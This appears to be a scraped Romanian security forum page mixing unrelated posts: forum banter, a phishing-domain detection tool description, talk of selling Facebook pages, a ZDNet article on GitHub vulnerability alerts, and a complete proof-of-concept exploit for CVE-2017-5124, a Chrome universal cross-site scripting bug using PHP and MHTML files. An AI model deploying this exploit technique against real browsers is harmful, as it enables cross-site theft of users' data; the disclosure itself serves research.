Leaderboard

Hackerii pizdii, viitorii asistati social... pune-n plm mana pe carte si lasa prostiile. Magazin online? vezi sa nu primesti ceva de sezon:

E simplu, te minte si ai 0 cunostinte.

Numele meu este Nicolae si am dat de acest forum cautand ceva informatii pe google. Ma ocup de ceva timp cu website-uri, youtube ( am renuntat pentru moment) si in ultimul timp cam cu tot ce tine de Instagram. Sper sa gasesc infirmatii utile si in acelasi timp sa ofer informatii utile!

Catching malicious phishing domain names using certstream SSL certificates live stream. This is just a working PoC, feel free to contribute and tweak the code to fit your needs Installation The script should work fine using Python2 or Python3. You will need the following python packages installed: certstream, tqdm, entropy, termcolor, tld, python_Levenshtein pip install -r requirements.txt Usage $ ./catch_phishing.py Example phishing caught License GNU GPLv3 Download: phishing_catcher-master.zip Source

@MrSkipy sa inteleg ca vinzi aceste pagini de facebook care au mii de like-uri dar doar cate 20-100 like-uri per postare? Trebuie sa intelegi ca pretul se calculeaza la engagement si nu la nr total de like-uri. 1 mil de likeuri pot cumpara cu 100 de dolari si eu de la un SMM provider dar engagementul e cel care conteaza. Iti pot arata o pagina pornita de mine acum 1 saptamana care are doar 900 de likeuri si care are 3-400 de likeuri per postare - FIECARE POSTARE.

Google Chrome versions prior to 62 universal cross site scripting proof of concept exploit. Download CVE-2017-5124-master.zip Content: PoC.mht PoC.php README.md Mirror: README.md # CVE-2017-5124 ### UXSS with MHTML DEMO: https://bo0om.ru/chrome_poc/PoC.php (tested on Chrome/61.0.3163.100) PoC.php <?php $filename=realpath("PoC.mht"); header( "Content-type: multipart/related"); readfile($filename); ?> PoC.mht MIME-Version: 1.0 Content-Type: multipart/related; type="text/html"; boundary="----MultipartBoundary--" CVE-2017-5124 ------MultipartBoundary-- Content-Type: application/xml; <?xml version="1.0" encoding="UTF-8"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE catalog [ <!ATTLIST xsl:stylesheet id ID #REQUIRED> ]> <xsl:stylesheet id="stylesheet" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="*"> <html><iframe style="display:none" src="https://google.com"></iframe></html> </xsl:template> </xsl:stylesheet> ------MultipartBoundary-- Content-Type: text/html Content-Location: https://google.com <script>alert('Location origin: '+location.origin)</script> ------MultipartBoundary---- Source

GitHub's new service will help developers clean up vulnerable project dependencies. Devlopers can view the security alerts in the repository's dependency graph, which can be accessed from 'Insights'. Image: GitHub Development platform GitHub has launched a new service that searches project dependencies in JavaScript and Ruby for known vulnerabilities and then alerts project owners if it finds any. The new service aims to help developers update project dependencies as soon as GitHub becomes aware of a newly announced vulnerability. GitHub will identify all public repositories that use the affected version of the dependency. Projects under private repositories will need to opt into the vulnerability-detection service. The alerts should have a big impact on security, given that GitHub now hosts nearly 70 million repositories, with projects that rely on dependent software packages or software libraries that frequently do not get updated when new flaws are disclosed. The alerts form part of GitHub's so-called 'dependency graph', which helps developers monitor projects that their code depends on, and lists a project's various Ruby and JavaScript dependencies. Developers can view the security alerts in the repository's dependency graph, which can be accessed from 'Insights'. The alerts are only sent to project owners and others with admin access to repositories. The company promises never to publicly disclose vulnerabilities for a specific repository. Users can choose to receive the alerts by email, web notifications or the GitHub interface. GitHub's is also using machine learning to suggest fixes from the GitHub community. The alerts are based on public vulnerabilities in Ruby gems and NPM, the package manager for Node.js, on MITRE's Common Vulnerabilities and Exposures (CVE) List. GitHub will add Python to its vulnerability alert service in 2018. Python, Ruby, and JavaScript are among the top five languages on GitHub, along with Java and PHP. It appears the alerts will be limited to flaws with CVE IDs initially. However, as GitHub notes many publicly disclosed flaws don't have CVE IDs. It suggests future improvements will help it identify more vulnerabilities as it collects more data about them. Source: zdnet.com

Daca te referi la treaba dintre Erdeesh si Ericcson e doar pregatire (care dureaza cativa ani) pentru a suporta 5G-ul, nu implementarea in sine. Chiar daca e promitator, momentan 5G-ul e inca in stadiul de research. De acolo si pana la stadiul de business si consumer roll-out e alta mancare de peste. Discutam recent cu un academic care lucreaza in domeniu si echipele lor au primit finantari de la Gov UK si firme gigant (printre care si Ericcson) de multe milioane de ££ pentru research si zicea ca se pune foarte mult accent pe securitate. O firma de consultanta si security cu cativa baieti (si fete ) destepti who know their stuff ar putea mulge ceva milioane in viitorul apropiat.